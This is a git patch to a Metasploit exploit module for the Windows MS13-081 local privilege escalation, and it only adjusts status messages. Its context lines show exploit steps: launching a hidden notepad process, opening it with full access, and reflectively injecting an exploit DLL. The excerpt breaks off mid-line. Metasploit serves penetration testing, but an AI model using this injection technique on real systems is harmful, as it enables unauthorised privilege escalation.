From abb03d0bbe214975bdfb83c2efc0d7579331fa15 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 10 Feb 2014 13:10:42 -0600 Subject: [PATCH] Fixing messages --- modules/exploits/windows/local/ms13_081_track_popup_menu.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms13_081_track_popup_menu.rb b/modules/exploits/windows/local/ms13_081_track_popup_menu.rb index 3d074433a3..7354fe7b3c 100644 --- a/modules/exploits/windows/local/ms13_081_track_popup_menu.rb +++ b/modules/exploits/windows/local/ms13_081_track_popup_menu.rb @@ -101,12 +101,13 @@ class Metasploit3 < Msf::Exploit::Local notepad_process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true}) begin process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) + print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError # Reader Sandbox won't allow to create a new process: # stdapi_sys_process_execute: Operation failed: Access is denied. + print_status("Operation failed. Trying to elevate the current process...") process = client.sys.process.open end - print_good("Process #{process.pid} launched.") print_status("Reflectively injecting the exploit DLL into #{process.pid}...") library_path = ::File.join(Msf::Config.data_directory, "exploits",